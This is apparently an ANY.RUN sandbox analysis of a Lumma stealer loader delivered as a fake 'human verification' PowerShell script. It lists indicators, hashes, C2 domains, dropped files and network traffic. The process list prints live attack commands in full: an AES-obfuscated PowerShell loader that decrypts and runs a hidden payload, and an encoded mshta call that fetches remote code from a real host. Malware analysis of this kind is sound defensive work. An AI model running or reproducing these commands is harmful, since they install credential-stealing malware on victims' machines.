File name:

human-verificati0n.b-cdn.net.ps1

Full analysis: https://app.any.run/tasks/fa3f4043-b7e2-4e3e-9cbd-58ae96dc216c
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: August 24, 2024, 20:33:23
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
stealer
lumma
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

3CA2D799CCF7CBB3B814D5AFDB90BBA5

SHA1:

17DCE99847E1963D885926DD0C8D48BBF1A97FAA

SHA256:

081A41C0999C054FDF213B6FE7A094A6C32710FBE06F9767C4ADAB1B623AD933

SSDEEP:

3:VSJJLNyAmarBO/tmt55akqizkJCobPROkJ+Egsd:snyuk854kqizkJC6OkUErd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6764)

    • Scans artifacts that could help determine the target

      • mshta.exe (PID: 7012)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6492)

    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 7012)

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 6492)

    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 6492)

    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 6492)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 6492)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 6492)

    • Actions looks like stealing of personal data

      • BitLockerToGo.exe (PID: 6972)

    • LUMMA has been detected (YARA)

      • BitLockerToGo.exe (PID: 6972)

  • SUSPICIOUS

    • Application launched itself

      • powershell.exe (PID: 6764)

    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 6764)

    • Base64-obfuscated command line is found

      • powershell.exe (PID: 6764)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 6764)
      • mshta.exe (PID: 7012)

    • Process drops legitimate windows executable

      • mshta.exe (PID: 7012)
      • powershell.exe (PID: 6492)

    • Executable content was dropped or overwritten

      • mshta.exe (PID: 7012)
      • powershell.exe (PID: 6492)

    • Drops the executable file immediately after the start

      • mshta.exe (PID: 7012)
      • powershell.exe (PID: 6492)

    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 7012)

    • Probably obfuscated PowerShell command line is found

      • mshta.exe (PID: 7012)

    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 6492)

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 6492)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 6492)

    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 6492)

    • Cryptography encrypted command line is found

      • powershell.exe (PID: 6492)

    • Searches for installed software

      • BitLockerToGo.exe (PID: 6972)

  • INFO

    • Checks proxy server information

      • mshta.exe (PID: 7012)
      • powershell.exe (PID: 6492)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 7012)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6492)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6492)

    • Disables trace logs

      • powershell.exe (PID: 6492)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 6492)

    • The executable file from the user directory is run by the Powershell process

      • 0WhatBotPlus.exe (PID: 7032)

    • Checks supported languages

      • 0WhatBotPlus.exe (PID: 7032)
      • BitLockerToGo.exe (PID: 6972)

    • Reads the software policy settings

      • BitLockerToGo.exe (PID: 6972)

    • Reads the computer name

      • BitLockerToGo.exe (PID: 6972)

    • Reads the machine GUID from the registry

      • BitLockerToGo.exe (PID: 6972)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Lumma

(PID) Process(6972) BitLockerToGo.exe
C2 (9)condedqpwqm.shop
stagedchheiqwo.shop
traineiwnqo.shop
locatedblsoqp.shop
onionoowzwqm.shop
caffegclasiqwp.shop
evoliutwoqm.shop
millyscroqwp.shop
stamppreewntnq.shop
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
130
Monitored processes
8
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs powershell.exe no specs mshta.exe powershell.exe conhost.exe no specs 0whatbotplus.exe no specs #LUMMA bitlockertogo.exe

Process information

PID
CMD
Path
Indicators
Parent process
6492"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KtBvFp($eFnJhB){return -split ($eFnJhB -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$bNGwFCyX = KtBvFp('B971875E7C9435BA5BC3C4BBDD7229A86FEB69D120CB79C20C1D8BECF828457AB5EAC16DF71723ADD9C60FBC3F4658CC313053B2F927A85AEFAB007C6ACD19E392B7D7A83B2688F0DD0B4090DEA3DE82CDBB9058554961DF737A1D83D3F5ABA5AF954CEE864C8D48A35166C00EC15A65D747A247824B491F08D1C935E1A135312056486D8F5DECFA2FF392F7653B8AECE532E1A4A89F10EB335155B6C74856D55E2790654EA288380DF781062958C988C517B80A566AAA4812B18AD685ECC5596D1303A0B78FDDD298EA5A955EC864C7BD32EC444FA83521B7A2D43403EF35CDA496671C6240AA6BF19BCA92EE92E52B952CF7A5891F5C6CACC26D14397891DBF075A3D115F475F56DBEC6C230E4D33146BB3EB24ACC11DFFC3D2D018CDF40BF1AB7FFC2FD10FBCBB76C2F13E2BFD3758A479C3331E56BF847215567C3DB5CC2C7CD138197D97D77F99F014D16D956F0DBCD5BB6E30848CC4607B4E87F8503DD0435CC43576C26D95F75A17144E8181C4F4E37DCE55639B2138EF7608CB83ABB18844742C9D69F2647AF41F062C992DC2F01FB28FD4489178ECEA4A6FE8FBC3098FE540A8CF38EE1F9CF9B9FC005E3265FEE4B794D78724451EF41F178C5DA4A38BC6952F288F2B6EE498260EF2B555EB1799D5F7D4A2C397FFFC15B4B3C22F453BC4BF44EB30808FFD8094B01B35E0B6F6647C25532A45129BFA6CA5AC8977F1AC8E57401E1F974D80D1A701203B277A5C24D404C1E4546A04AB5E82B7E5A90AADA602E2080CAEB1A6FCDFF5B73706A19B5623BED5CE965DCCD21CFE8E27E2EAF1992C6A1581A88D488A2EB48A37825A1E9B8D24D19408F713A1DAB226AC49E6C504E404D81C8C66A76E8B8EBC5DEC625CD4B993D4ABCB7B5429B6854A0CDC3E80F2AF8E54CEFBFC6288AB2C26BA7FA1A854ACC8D19910B2DF6290A09550847F64AC28BD23211CB48A4B36C233F07B383A2B3BEE6F2027EC40558B7ED32E4C09117F456149576A4C0E736F8262A62D23CD88EA8AE90C1D4101535645B8935582DA83F2F3D5468BE94E3FC21EEA4963AE88266B34BC2AB22ED84C487AA7987A5F528573AB10DF91F673D0AF44159EA003FEC380122D2CB2B5B2F06E324796E77FA9D397B27F80CB241574276FDB8E0C0323E7F0C8F35EE92A831A3E5A0450EF818B2934C26EFF638C1F1F829FD7467D6057A1E78DEBE7CC92336E32E5B879BFDF750169A9AE0E738F9FFC04C0D6ADC2743FD7175BE3918B7A8E9C9BA6B64CA8F32EE93767C04A1EA2D5D8E44325E43A5454E0D53EED6C92527F203D25E0B6B495866932192D845E3F32C74BD505A7170D188C6735BF812F84D4B647372EF843BF95E81092E07C2DA93AA51CCF22548298C303516E0A767C6E347AE6A3BF5170164D1477B5F764A3306685C311CDE9C0E487B844EDCA9B4F216C9BA3B8A7DA3E286FFC9CF818C7CF3DBE649769861524D7C52A6CD214A23B69ED49535C552C0CC52CF33587A076F5F892F4FE18EDA01C93625DA8D4061A42CC8914C7339E3E5A3388180F0FF8CCB9508149D622489498D0F923753769847E72ED8304EF56C5A68036D667AA2C8D4F28341550E40B98B15');$tPhmg = [System.Security.Cryptography.Aes]::Create();$tPhmg.Key = KtBvFp('564D477773755066636B4D7050706C41');$tPhmg.IV = New-Object byte[] 16;$amaPHyLq = $tPhmg.CreateDecryptor();$OmSZlNHiw = $amaPHyLq.TransformFinalBlock($bNGwFCyX, 0, $bNGwFCyX.Length);$HCgvJhSCY = [System.Text.Encoding]::Utf8.GetString($OmSZlNHiw);$amaPHyLq.Dispose();& $HCgvJhSCY.Substring(0,3) $HCgvJhSCY.Substring(3)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
6496\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6764"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\Desktop\human-verificati0n.b-cdn.net.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
6772\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6900"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdAAyAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAxACIAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
6972"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
0WhatBotPlus.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BitLocker To Go Reader
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\bitlockerdiscoveryvolumecontents\bitlockertogo.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
Lumma
(PID) Process(6972) BitLockerToGo.exe
C2 (9)condedqpwqm.shop
stagedchheiqwo.shop
traineiwnqo.shop
locatedblsoqp.shop
onionoowzwqm.shop
caffegclasiqwp.shop
evoliutwoqm.shop
millyscroqwp.shop
stamppreewntnq.shop
7012"C:\WINDOWS\system32\mshta.exe" https://bidvert2.b-cdn.net/smart11C:\Windows\System32\mshta.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
7032"C:\Users\admin\AppData\Local\Temp\0WhatBotPlus.exe" C:\Users\admin\AppData\Local\Temp\0WhatBotPlus.exepowershell.exe
User:
admin
Company:
WhatBotPlus
Integrity Level:
MEDIUM
Description:
WhatBotPlus Setup
Exit code:
666
Version:
Modules
Images
c:\users\admin\appdata\local\temp\0whatbotplus.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\powrprof.dll
Total events
31 176
Read events
30 897
Write events
279
Delete events
0

Modification events

(PID) Process:(7012) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(7012) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(7012) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(7012) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(7012) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7012) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(7012) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(6492) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(6492) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(6492) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
8
Suspicious files
5
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
6764powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\70C2GAL45V7KZQHJYSSL.tempbinary
MD5:C5AE9AC2C381A2C7D96C3675AEC8BA5C
SHA256:A66F0A8072BBD35883CB01E3B0A851D471BE7992EFA75FCC17595C8935C2FB0F
6764powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF11e1e1.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
6900powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dcj4jp3y.3fl.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6492powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5jedc0kc.nxt.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6492powershell.exeC:\Users\admin\AppData\Local\Temp\smart1.zipcompressed
MD5:D4FB28BDF42F016C7CA78ECA6AB763B5
SHA256:879D758BC82D3001F4E75730FC6E62887FC4469B602ABB2A515ADFD52FBE5549
6900powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:FEEDE15A8EE5ADACA8C0BF802D671C69
SHA256:4DF61DD6E4A2C48344A885B469424F3EDFBB512445D952AB22432E0D266504A9
6492powershell.exeC:\Users\admin\AppData\Local\Temp\wxmsw32u_xrc_gcc_custom.dllexecutable
MD5:923E97F86B22ABCB602F6AB16D2B0293
SHA256:95E36F082AC1BD2EE75C7C3D7371C8332CD5F36B3AF0E4146689EE8790E7F244
6492powershell.exeC:\Users\admin\AppData\Local\Temp\comdlg32.dllexecutable
MD5:E09249B56EB1DB773B12866A205A7078
SHA256:5B6129DE2C4A5D7E647728D3B09CBD26214D02B15A2EC8FB07888D3361101166
6492powershell.exeC:\Users\admin\AppData\Local\Temp\0WhatBotPlus.exeexecutable
MD5:F1D21AB58BB1FDBF921EF77E00F7C4B2
SHA256:D55BF242CF55B18737F72327EA752D3657A5B7C79BC2F71A27C7533FF7BE4C3F
6492powershell.exeC:\Users\admin\AppData\Local\Temp\wvrcimprov.dllexecutable
MD5:3FA3F6F84B1ACB7CFBE329CFEAD0687A
SHA256:EF464FA7D015CD47C1AE7115676B7B3B8327AB6DB3C35562E2CEE79EA116372E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
23
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
138.199.36.9:443
https://bidvert2.b-cdn.net/smart11
unknown
executable
164 Kb
unknown
GET
200
138.199.36.9:443
https://bidvert2.b-cdn.net/smart1.zip
unknown
compressed
10.0 Mb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3412
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
192.168.100.255:138
whitelisted
2096
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
2120
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
3888
svchost.exe
239.255.255.250:1900
whitelisted
7012
mshta.exe
138.199.36.11:443
bidvert2.b-cdn.net
Datacamp Limited
DE
unknown
4324
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
6492
powershell.exe
138.199.36.11:443
bidvert2.b-cdn.net
Datacamp Limited
DE
unknown
6972
BitLockerToGo.exe
188.114.97.3:443
onionoowzwqm.shop
CLOUDFLARENET
NL
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
google.com
  • 142.250.186.174
whitelisted
bidvert2.b-cdn.net
  • 138.199.36.11
whitelisted
onionoowzwqm.shop
  • 188.114.97.3
  • 188.114.96.3
malicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
human-verificati0n.b-cdn.net.ps1